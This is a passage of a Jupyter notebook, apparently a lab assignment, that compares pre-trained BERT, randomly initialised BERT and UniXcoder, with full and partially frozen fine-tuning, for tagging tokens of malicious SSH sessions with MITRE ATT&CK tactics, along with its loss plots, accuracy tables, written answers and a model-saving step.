print("SUMMARY: Learning Rate Comparison for BERT Fine-Tuned")
print("="*90)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in bert_lr_labels:
    # Index 2 of each tuple holds the token accuracy of that split
    train_acc = bert_results[lr_label]['train'][2]
    val_acc   = bert_results[lr_label]['val'][2]
    test_acc  = bert_results[lr_label]['test'][2]
    print(
        f"{lr_label:<20} {_format_accuracy(train_acc):<15} "
        f"{_format_accuracy(val_acc):<15} {_format_accuracy(test_acc):<15}"
    )
print("="*90)

# Repeat similar blocks for other models (BERT Naked, UniXcoder, UniXcoder Frozen/Head Only) as needed.

Remember: the model classifies every token, so we need a function to post-process and gather the predictions!

Define metrics and a function named `compute_metrics`

Q: Can the model achieve "good" results with only 251 training labeled samples?

Answer: 
Yes, the model achieves surprisingly high token accuracy (~84%) despite the extremely small training set. This is because BERT leverages Transfer Learning: it was pre-trained on a massive corpus (Wikipedia/Books) and already understands general linguistic structures (command-like patterns, paths, and flags).

However, the Macro F1-score (~0.52) reveals that the model struggles significantly with Class Imbalance.
- Discovery and Execution tactics are well-represented and perform well.

Q: Where does it have the most difficulties?

Answer: The model has the most difficulty with rare classes (like Impact or Persistence) where the "support" (number of samples) is very low. With only 251 samples total, some tactics appear only a handful of times, making it impossible for the model to generalize those specific intentions effectively.

Assume that this is a ‘simple problem’ (i.e., any model, refined with the same samples, could achieve the same scores). Therefore, create a baseline where instead of pre-trained BERT (with its pre-trained weights), you load only the BERT architecture. Train this ‘naked’ BERT in an end-to-end manner.

Q: Can you achieve the same performance with the "naked" BERT?

Answer: No, the "Naked" BERT (trained from scratch with random weights) performs significantly worse across all metrics.
- BERT Fine-tuned: Macro F1 ~0.52, Token Accuracy ~84%.
- BERT Naked: Macro F1 ~0.42, Token Accuracy ~73%.

This experiment demonstrates the importance of Pre-training. Without the weights inherited from a large-scale corpus, the BERT architecture acts as an empty shell. It cannot learn the complex syntax of SSH malicious sessions and the semantic nuances of MITRE tactics from just 251 samples. This confirms that Transfer Learning is mandatory for small-scale cybersecurity datasets.

## Fine-Tuning a Naked Bert Model

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for BERT Naked
# =============================
# For each learning rate: build a BERT with the bert-base-uncased architecture but
# without its pre-trained weights, train it, evaluate the best checkpoint, and
# record the loss curves and token accuracy under the "LR=<value>" label.

naked_lrs = [5e-6, 1e-5, 5e-5]
naked_lr_labels = [f"LR={lr}" for lr in naked_lrs]
naked_train_losses = {}
naked_val_losses = {}
naked_results = {}

for lr, lr_label in zip(naked_lrs, naked_lr_labels):
    # Only the configuration is fetched; from_config() instantiates the model
    # from that configuration instead of loading a checkpoint.
    config = AutoConfig.from_pretrained(
        "google-bert/bert-base-uncased",
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    )
    naked_model = AutoModelForTokenClassification.from_config(config).to(device)
    optimizer = AdamW(naked_model.parameters(), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler = get_scheduler(
        "linear",
        optimizer=optimizer,
        num_warmup_steps=0,
        num_training_steps=num_training_steps,
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(naked_model, optimizer, lr_scheduler)
    naked_train_losses[lr_label] = train_losses
    naked_val_losses[lr_label] = val_losses

    # Evaluate BEFORE reporting: the classification report must describe the model
    # trained in this iteration, not the predictions left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(naked_model, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"Naked-BERT Fine-tuned {lr_label}")
    plot_stats(f"Naked-BERT Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # NOTE(review): no separate training-set evaluation is run here, so the
    # 'train' slot holds the same token accuracy as 'test'. The summary table's
    # "Train Acc" column therefore mirrors "Test Acc" until that is added.
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    naked_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }


In [None]:

# Learning-rate comparison for the naked (non-pre-trained) BERT: loss curves for
# every LR on a shared two-panel figure, followed by a plain-text accuracy table.
TITLE_FONTSIZE, LABEL_FONTSIZE = 22, 18
TICK_FONTSIZE, LEGEND_FONTSIZE = 16, 16
LINE_WIDTH = 3.2
colors = ["#1b9e77", "#d95f02", "#7570b3"]  # one colour per learning rate, in grid order

fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
ax1, ax2 = axes

# Left panel = training loss, right panel = validation loss; both share one styling recipe.
for panel, curves_by_lr, panel_title in (
    (ax1, naked_train_losses, "BERT Naked — Training Loss"),
    (ax2, naked_val_losses, "BERT Naked — Validation Loss"),
):
    for i, (lr_label, losses) in enumerate(curves_by_lr.items()):
        panel.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
    panel.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    panel.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    panel.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    panel.tick_params(labelsize=TICK_FONTSIZE)
    panel.grid(alpha=0.3)
    panel.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
# Export before plt.show() so the figure is still the current one when it is written out.
save_figure_for_report("task3_bertnaked_lr_comparison_report.png")
plt.show()

# Accuracy table: one row per learning rate; a missing validation accuracy prints as '-'.
rule = "="*90
print("\n" + rule)
print("SUMMARY: Learning Rate Comparison for BERT Naked")
print(rule)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in naked_lr_labels:
    row = naked_results[lr_label]
    # Each entry is a 3-tuple; the accuracy sits in the last slot.
    train_acc, val_acc, test_acc = row['train'][2], row['val'][2], row['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print(rule)

## Fine-tuning UniXcoder

We use microsoft/unixcoder-base. Since this model is pre-trained on code (C, Java, Python, etc.), it often understands the structured syntax of shell commands better than a general-purpose language model like BERT.

Now fine-tune Unixcoder. Since Unixcoder was pre-trained with a coding corpus, the hypothesis is that it has more prior knowledge even on SSH (and therefore, it can obtain better results).

Q: Can you confirm this hypothesis? How do the metrics change compared to the previous models?

Answer: Yes, the hypothesis is confirmed. UniXcoder outperformed the standard BERT model significantly.
- UniXcoder Macro F1: ~0.74 (vs. ~0.52 for BERT).
- UniXcoder Fidelity: ~0.84 (vs. ~0.80 for BERT).

Why it improved: UniXcoder was pre-trained on a corpus of programming code. Since SSH logs follow a structured syntax (commands, flags, parameters) that is much closer to source code than to the natural language found in BERT's training set, UniXcoder has a better "prior knowledge" of how tokens relate in a command-line environment. This resulted in an absolute increase of about 22 percentage points in the Macro F1-score (from ~0.52 to ~0.74).

In [50]:
# --- UniXcoder data pipeline: checkpoint -> tokenizer -> tokenized splits -> DataLoaders ---
model_checkpoint_ux = "microsoft/unixcoder-base"

# Rebind the global `tokenizer`: tokenize_and_align_labels reads it, so this swap is
# what makes the re-tokenization below use the UniXcoder vocabulary.
# add_prefix_space=True is set because the checkpoint is RoBERTa-based.
tokenizer = AutoTokenizer.from_pretrained(
    model_checkpoint_ux,
    model_max_length=512,
    add_prefix_space=True,
)

# Re-tokenize every split, dropping the raw columns of the train split.
raw_columns = encoded_dataset["train"].column_names
tokenized_datasets_ux = encoded_dataset.map(
    tokenize_and_align_labels,
    remove_columns=raw_columns,
    batched=True,
)

# Same batch size as the BERT runs (16) so the comparison stays like-for-like.
data_collator = DataCollatorForTokenClassification(tokenizer=tokenizer)
loader_kwargs = {"batch_size": 16, "collate_fn": data_collator}

# These rebind the global loaders.
# NOTE(review): presumably training_loop / evaluate_model read them as globals,
# and the map output shows three splits, so confirm "test" is the intended
# split for eval_dataloader.
train_dataloader = DataLoader(tokenized_datasets_ux["train"], shuffle=True, **loader_kwargs)
eval_dataloader = DataLoader(tokenized_datasets_ux["test"], **loader_kwargs)

print(f"UniXcoder DataLoaders ready. Tokenizer: {model_checkpoint_ux}")

Map:   0%|          | 0/200 [00:00<?, ? examples/s]

Map:   0%|          | 0/51 [00:00<?, ? examples/s]

Map:   0%|          | 0/108 [00:00<?, ? examples/s]

UniXcoder DataLoaders ready. Tokenizer: microsoft/unixcoder-base


We swap the global tokenizer variable so that your tokenize_and_align_labels function uses the UniXcoder vocabulary. We keep the batch_size=16 to ensure the comparison with BERT is fair.

In [None]:
# =============================
# Grid Search: Learning Rate Comparison for UniXcoder (Full Fine-Tune)
# =============================
# For each learning rate: load the pre-trained UniXcoder checkpoint, fine-tune all
# of its parameters, evaluate the best checkpoint, and record the loss curves and
# token accuracy under the "LR=<value>" label.

unix_lrs = [5e-6, 1e-5, 5e-5]
unix_lr_labels = [f"LR={lr}" for lr in unix_lrs]
unix_train_losses = {}
unix_val_losses = {}
unix_results = {}

# Best checkpoint over the whole LR grid, chosen by lowest validation loss.
# The "Save the best model" cell reads `best_model_ux`; without this bookkeeping
# that name is never assigned by the grid search.
best_model_ux = None
best_val_loss_ux = float("inf")
best_lr_label_ux = None

for lr, lr_label in zip(unix_lrs, unix_lr_labels):
    # Fresh pre-trained model for every LR so runs do not contaminate each other.
    model_ux = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    ).to(device)
    optimizer_ux = AdamW(model_ux.parameters(), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_ux = get_scheduler(
        "linear",
        optimizer=optimizer_ux,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_ux, optimizer_ux, lr_scheduler_ux)
    unix_train_losses[lr_label] = train_losses
    unix_val_losses[lr_label] = val_losses

    # Keep the checkpoint of the best-performing LR for the save cell.
    # NOTE(review): assumes best_val_loss is a plain number and best_model is the
    # object the save cell can call save_pretrained() on — confirm in training_loop.
    if best_val_loss < best_val_loss_ux:
        best_val_loss_ux = best_val_loss
        best_model_ux = best_model
        best_lr_label_ux = lr_label

    # Evaluate BEFORE reporting: the classification report must describe the model
    # trained in this iteration, not the predictions left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(model_ux, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCode Fine-tuned {lr_label}")
    plot_stats(f"UnixCode Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # NOTE(review): no separate training-set evaluation is run here, so the
    # 'train' slot holds the same token accuracy as 'test'. The summary table's
    # "Train Acc" column therefore mirrors "Test Acc" until that is added.
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    unix_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Learning-rate comparison for the fully fine-tuned UniXcoder: loss curves for every
# LR on a shared two-panel figure, followed by a plain-text accuracy table.
TITLE_FONTSIZE, LABEL_FONTSIZE = 22, 18
TICK_FONTSIZE, LEGEND_FONTSIZE = 16, 16
LINE_WIDTH = 3.2
colors = ["#1b9e77", "#d95f02", "#7570b3"]  # one colour per learning rate, in grid order

fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
ax1, ax2 = axes

# Left panel = training loss, right panel = validation loss; both share one styling recipe.
for panel, curves_by_lr, panel_title in (
    (ax1, unix_train_losses, "UniXcoder — Training Loss"),
    (ax2, unix_val_losses, "UniXcoder — Validation Loss"),
):
    for i, (lr_label, losses) in enumerate(curves_by_lr.items()):
        panel.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
    panel.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    panel.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    panel.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    panel.tick_params(labelsize=TICK_FONTSIZE)
    panel.grid(alpha=0.3)
    panel.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
# Export before plt.show() so the figure is still the current one when it is written out.
save_figure_for_report("task3_unixcoder_lr_comparison_report.png")
plt.show()

# Accuracy table: one row per learning rate; a missing validation accuracy prints as '-'.
rule = "="*90
print("\n" + rule)
print("SUMMARY: Learning Rate Comparison for UniXcoder (Full Fine-Tune)")
print(rule)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in unix_lr_labels:
    row = unix_results[lr_label]
    # Each entry is a 3-tuple; the accuracy sits in the last slot.
    train_acc, val_acc, test_acc = row['train'][2], row['val'][2], row['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print(rule)


We initialize the model and pass it into your training_loop. This allows us to observe if UniXcoder converges faster or achieves a lower validation loss than BERT.

## Fine-Tuning UniXcoder (Last 2 Layers + Head)

In [None]:
# =============================
# Grid Search: UniXcoder (Last 2 Layers + Head)
# =============================
# For each learning rate: load the pre-trained UniXcoder checkpoint, freeze
# everything except the last two encoder layers and the classification head,
# train, evaluate the best checkpoint, and record the loss curves and token
# accuracy under the "LR=<value>" label.

frozen2_lrs = [5e-6, 1e-5, 5e-5]
frozen2_lr_labels = [f"LR={lr}" for lr in frozen2_lrs]
frozen2_train_losses = {}
frozen2_val_losses = {}
frozen2_results = {}

for lr, lr_label in zip(frozen2_lrs, frozen2_lr_labels):
    # Label maps are passed as in the full fine-tune run so the model config
    # carries the same label names.
    model_frozen_2 = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    ).to(device)

    # Freeze everything, then re-enable gradients for the head ...
    for param in model_frozen_2.parameters():
        param.requires_grad = False
    for param in model_frozen_2.classifier.parameters():
        param.requires_grad = True
    # ... and for the last two encoder layers (indices 10 and 11 of the 12-layer base model).
    for encoder_layer in model_frozen_2.roberta.encoder.layer[-2:]:
        for param in encoder_layer.parameters():
            param.requires_grad = True

    # Only trainable parameters are handed to the optimizer.
    optimizer_2 = AdamW(filter(lambda p: p.requires_grad, model_frozen_2.parameters()), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_2 = get_scheduler(
        "linear",
        optimizer=optimizer_2,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_2, optimizer_2, lr_scheduler_2)
    frozen2_train_losses[lr_label] = train_losses
    frozen2_val_losses[lr_label] = val_losses

    # Evaluate BEFORE reporting: the classification report must describe the model
    # trained in this iteration, not the predictions left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_2, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_LH_Fine-tuned {lr_label}")
    plot_stats(f"UnixCoder_LH_Fine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # NOTE(review): no separate training-set evaluation is run here, so the
    # 'train' slot holds the same token accuracy as 'test'. The summary table's
    # "Train Acc" column therefore mirrors "Test Acc" until that is added.
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    frozen2_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Learning-rate comparison for UniXcoder with only the last two layers and the head
# trainable: loss curves for every LR on a shared two-panel figure, followed by a
# plain-text accuracy table.
TITLE_FONTSIZE, LABEL_FONTSIZE = 22, 18
TICK_FONTSIZE, LEGEND_FONTSIZE = 16, 16
LINE_WIDTH = 3.2
colors = ["#1b9e77", "#d95f02", "#7570b3"]  # one colour per learning rate, in grid order

fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
ax1, ax2 = axes

# Left panel = training loss, right panel = validation loss; both share one styling recipe.
for panel, curves_by_lr, panel_title in (
    (ax1, frozen2_train_losses, "UniXcoder (Last 2 + Head) — Training Loss"),
    (ax2, frozen2_val_losses, "UniXcoder (Last 2 + Head) — Validation Loss"),
):
    for i, (lr_label, losses) in enumerate(curves_by_lr.items()):
        panel.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
    panel.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    panel.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    panel.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    panel.tick_params(labelsize=TICK_FONTSIZE)
    panel.grid(alpha=0.3)
    panel.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
# Export before plt.show() so the figure is still the current one when it is written out.
save_figure_for_report("task3_unixcoder_frozen2_lr_comparison_report.png")
plt.show()

# Accuracy table: one row per learning rate; a missing validation accuracy prints as '-'.
rule = "="*90
print("\n" + rule)
print("SUMMARY: Learning Rate Comparison for UniXcoder (Last 2 + Head)")
print(rule)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in frozen2_lr_labels:
    row = frozen2_results[lr_label]
    # Each entry is a 3-tuple; the accuracy sits in the last slot.
    train_acc, val_acc, test_acc = row['train'][2], row['val'][2], row['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print(rule)

This generates the metrics (Accuracy, Macro F1, Fidelity) and the per-class barplot. You can now compare these numbers directly with your BERT results to confirm the hypothesis.

## Alternative Fine-Tuning (Freezing)
We will now take your best model (likely UniXcoder) and compare two freezing strategies. Note: UniXcoder is based on RoBERTa, so its internal layer structure is accessed via model.roberta.

### Last Two Layers + Head

By unfreezing only the last two layers, we allow the model to adapt its high-level semantic representations to the SSH domain while keeping the "general code knowledge" in the earlier layers intact.

In [None]:
# =============================
# Grid Search: UniXcoder (Alternative Fine-Tuning: Last 2 Layers + Head)
# =============================
# For each learning rate: load the pre-trained UniXcoder checkpoint, freeze
# everything except the last two encoder layers and the classification head,
# train, evaluate the best checkpoint, and record the loss curves and token
# accuracy under the "LR=<value>" label.

alt_frozen2_lrs = [5e-6, 1e-5, 5e-5]
alt_frozen2_lr_labels = [f"LR={lr}" for lr in alt_frozen2_lrs]
alt_frozen2_train_losses = {}
alt_frozen2_val_losses = {}
alt_frozen2_results = {}

for lr, lr_label in zip(alt_frozen2_lrs, alt_frozen2_lr_labels):
    # Label maps are passed as in the full fine-tune run so the model config
    # carries the same label names.
    model_frozen_2 = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    ).to(device)

    # Freeze everything, then re-enable gradients for the head ...
    for param in model_frozen_2.parameters():
        param.requires_grad = False
    for param in model_frozen_2.classifier.parameters():
        param.requires_grad = True
    # ... and for the last two encoder layers (indices 10 and 11 of the 12-layer base model).
    for encoder_layer in model_frozen_2.roberta.encoder.layer[-2:]:
        for param in encoder_layer.parameters():
            param.requires_grad = True

    # Only trainable parameters are handed to the optimizer.
    optimizer_2 = AdamW(filter(lambda p: p.requires_grad, model_frozen_2.parameters()), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_2 = get_scheduler(
        "linear",
        optimizer=optimizer_2,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_2, optimizer_2, lr_scheduler_2)
    alt_frozen2_train_losses[lr_label] = train_losses
    alt_frozen2_val_losses[lr_label] = val_losses

    # Evaluate BEFORE reporting: the classification report must describe the model
    # trained in this iteration, not the predictions left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_2, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_LH_AltFine-tuned {lr_label}")
    plot_stats(f"UnixCoder_LH_AltFine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # NOTE(review): no separate training-set evaluation is run here, so the
    # 'train' slot holds the same token accuracy as 'test'. The summary table's
    # "Train Acc" column therefore mirrors "Test Acc" until that is added.
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    alt_frozen2_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }

In [None]:

# Learning-rate comparison for the alternative "last 2 layers + head" UniXcoder runs:
# loss curves for every LR on a shared two-panel figure, followed by a plain-text
# accuracy table.
TITLE_FONTSIZE, LABEL_FONTSIZE = 22, 18
TICK_FONTSIZE, LEGEND_FONTSIZE = 16, 16
LINE_WIDTH = 3.2
colors = ["#1b9e77", "#d95f02", "#7570b3"]  # one colour per learning rate, in grid order

fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
ax1, ax2 = axes

# Left panel = training loss, right panel = validation loss; both share one styling recipe.
for panel, curves_by_lr, panel_title in (
    (ax1, alt_frozen2_train_losses, "UniXcoder (Alt: Last 2 + Head) — Training Loss"),
    (ax2, alt_frozen2_val_losses, "UniXcoder (Alt: Last 2 + Head) — Validation Loss"),
):
    for i, (lr_label, losses) in enumerate(curves_by_lr.items()):
        panel.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
    panel.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    panel.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    panel.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    panel.tick_params(labelsize=TICK_FONTSIZE)
    panel.grid(alpha=0.3)
    panel.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
# Export before plt.show() so the figure is still the current one when it is written out.
save_figure_for_report("task3_unixcoder_altfrozen2_lr_comparison_report.png")
plt.show()

# Accuracy table: one row per learning rate; a missing validation accuracy prints as '-'.
rule = "="*90
print("\n" + rule)
print("SUMMARY: LR Comparison for UniXcoder (Alt: Last 2 + Head)")
print(rule)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in alt_frozen2_lr_labels:
    row = alt_frozen2_results[lr_label]
    # Each entry is a 3-tuple; the accuracy sits in the last slot.
    train_acc, val_acc, test_acc = row['train'][2], row['val'][2], row['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print(rule)


### Head Only

In [None]:
# =============================
# Grid Search: UniXcoder (Alternative Fine-Tuning: Head Only)
# =============================
# For each learning rate: load the pre-trained UniXcoder checkpoint, freeze the
# whole network except the classification head, train, evaluate the best
# checkpoint, and record the loss curves and token accuracy under the
# "LR=<value>" label. The LR grid is higher than in the other experiments.

alt_frozen_head_lrs = [1e-4, 5e-4, 1e-3]
alt_frozen_head_lr_labels = [f"LR={lr}" for lr in alt_frozen_head_lrs]
alt_frozen_head_train_losses = {}
alt_frozen_head_val_losses = {}
alt_frozen_head_results = {}

for lr, lr_label in zip(alt_frozen_head_lrs, alt_frozen_head_lr_labels):
    # Label maps are passed as in the full fine-tune run so the model config
    # carries the same label names.
    model_frozen_head = AutoModelForTokenClassification.from_pretrained(
        model_checkpoint_ux,
        num_labels=len(id2label),
        id2label=id2label,
        label2id=label2id
    ).to(device)

    # Freeze everything, then re-enable gradients for the classification head only.
    for param in model_frozen_head.parameters():
        param.requires_grad = False
    for param in model_frozen_head.classifier.parameters():
        param.requires_grad = True

    # Hand only the trainable parameters to the optimizer, matching the
    # "last 2 layers + head" experiments.
    optimizer_head = AdamW(filter(lambda p: p.requires_grad, model_frozen_head.parameters()), lr=lr)
    num_training_steps = N_TRAIN_EPOCHS * len(train_dataloader)
    lr_scheduler_head = get_scheduler(
        "linear",
        optimizer=optimizer_head,
        num_warmup_steps=0,
        num_training_steps=num_training_steps
    )
    best_model, best_epoch, best_val_loss, train_losses, val_losses = training_loop(model_frozen_head, optimizer_head, lr_scheduler_head)
    alt_frozen_head_train_losses[lr_label] = train_losses
    alt_frozen_head_val_losses[lr_label] = val_losses

    # Evaluate BEFORE reporting: the classification report must describe the model
    # trained in this iteration, not the predictions left over from a previous run.
    full_predictions, full_labels, test_metrics = evaluate_model(model_frozen_head, best_model)

    print_classification_report(full_labels, full_predictions, model_name=f"UnixCoder_Head_AltFine-tuned {lr_label}")
    plot_stats(f"UnixCoder_Head_AltFine-tuned {lr_label}", train_losses, val_losses, best_epoch)

    # NOTE(review): no separate training-set evaluation is run here, so the
    # 'train' slot holds the same token accuracy as 'test'. The summary table's
    # "Train Acc" column therefore mirrors "Test Acc" until that is added.
    train_acc = test_metrics["token_accuracy"]
    val_acc = None
    test_acc = test_metrics["token_accuracy"]
    alt_frozen_head_results[lr_label] = {
        'train': (None, None, train_acc),
        'val': (None, None, val_acc),
        'test': (None, None, test_acc)
    }


In [None]:

# Learning-rate comparison for the head-only UniXcoder runs: loss curves for every
# LR on a shared two-panel figure, followed by a plain-text accuracy table.
TITLE_FONTSIZE, LABEL_FONTSIZE = 22, 18
TICK_FONTSIZE, LEGEND_FONTSIZE = 16, 16
LINE_WIDTH = 3.2
colors = ["#1b9e77", "#d95f02", "#7570b3"]  # one colour per learning rate, in grid order

fig, axes = plt.subplots(1, 2, figsize=(17, 6.5), dpi=160)
ax1, ax2 = axes

# Left panel = training loss, right panel = validation loss; both share one styling recipe.
for panel, curves_by_lr, panel_title in (
    (ax1, alt_frozen_head_train_losses, "UniXcoder (Alt: Head Only) — Training Loss"),
    (ax2, alt_frozen_head_val_losses, "UniXcoder (Alt: Head Only) — Validation Loss"),
):
    for i, (lr_label, losses) in enumerate(curves_by_lr.items()):
        panel.plot(losses, label=lr_label, linewidth=LINE_WIDTH, color=colors[i])
    panel.set_title(panel_title, fontsize=TITLE_FONTSIZE, fontweight='bold')
    panel.set_xlabel("Epoch", fontsize=LABEL_FONTSIZE)
    panel.set_ylabel("Loss", fontsize=LABEL_FONTSIZE)
    panel.tick_params(labelsize=TICK_FONTSIZE)
    panel.grid(alpha=0.3)
    panel.legend(frameon=True, framealpha=0.95, fontsize=LEGEND_FONTSIZE, edgecolor="gray")

plt.tight_layout()
# Export before plt.show() so the figure is still the current one when it is written out.
save_figure_for_report("task3_unixcoder_altfrozenhead_lr_comparison_report.png")
plt.show()

# Accuracy table: one row per learning rate; a missing validation accuracy prints as '-'.
rule = "="*90
print("\n" + rule)
print("SUMMARY: LR Comparison for UniXcoder (Alt: Head Only)")
print(rule)
print(f"{'Learning Rate':<20} {'Train Acc':<15} {'Val Acc':<15} {'Test Acc':<15}")
print("-"*90)
for lr_label in alt_frozen_head_lr_labels:
    row = alt_frozen_head_results[lr_label]
    # Each entry is a 3-tuple; the accuracy sits in the last slot.
    train_acc, val_acc, test_acc = row['train'][2], row['val'][2], row['test'][2]
    print(f"{lr_label:<20} {train_acc:<15.2f} {val_acc if val_acc is not None else '-':<15} {test_acc:<15.2f}")
print(rule)


Q: How many parameters did you fine-tune? Is the training faster? Did you have to change the LR? How much do you lose in performance?

Answer: The results of the freezing experiments are summarized below:

1. Parameters Count:
    - Full Fine-tuning: ~125 Million parameters (100%).
    - Last 2 Layers + Head: ~14.5 Million parameters (~11%).
    - Head Only: ~10,000 parameters (<0.01%).

2. Training Speed: Training was notably faster in the frozen scenarios. While the forward pass takes the same time, the backward pass (gradient calculation) is bypassed for the majority of the network, significantly reducing computational overhead.

3. Learning Rate (LR) Adjustment:
    - For the Head Only experiment, it was necessary to increase the LR to 1e-3 (the grid was shifted to 1e-4–1e-3, versus 5e-6–5e-5 for the other runs). Because the "brain" (backbone) is fixed, the head needs a stronger optimization signal to align itself with the fixed features.

4. Performance Loss:
    - Freezing the first 10 layers resulted in a small performance drop (Macro F1 dropped from 0.74 to 0.71).
    - Freezing the entire backbone (Head Only) resulted in a major drop (Macro F1 dropped to 0.64).
    - Conclusion: Fine-tuning the last 2 layers is the "sweet spot" for this task—achieving about 96% of the full fine-tuning Macro F1 (0.71 vs. 0.74) while training roughly 9x fewer parameters (~14.5M vs. ~125M).

Based on these findings, we chose the Full Fine-tuned UniXcoder as our production model for Task 4. It provides the highest Session Fidelity (0.84), ensuring that our threat inference on the cyberlab.csv dataset will be as accurate as possible for forensic analysis.

## Save the best model

In [None]:
# --- Persist the selected UniXcoder checkpoint next to its tokenizer ---
# Target folder: <project_path>/best_model/model
# (project_path is /content/drive/MyDrive/Projects/Laboratory4/)
model_dir = os.path.join(project_path, "best_model/model")
os.makedirs(model_dir, exist_ok=True)  # no error if the folder is already there

print(f"Saving the best model and tokenizer to: {model_dir}")

# `best_model_ux` is the UniXcoder checkpoint with the best validation loss;
# `tokenizer` is the UniXcoder tokenizer. Both are written to the same folder,
# model first, tokenizer second.
for artifact in (best_model_ux, tokenizer):
    artifact.save_pretrained(model_dir)

print("Model and Tokenizer saved successfully to Google Drive!")

Saving the best model and tokenizer to: /content/drive/MyDrive/Projects/Laboratory4/best_model/model
Model and Tokenizer saved successfully to Google Drive!
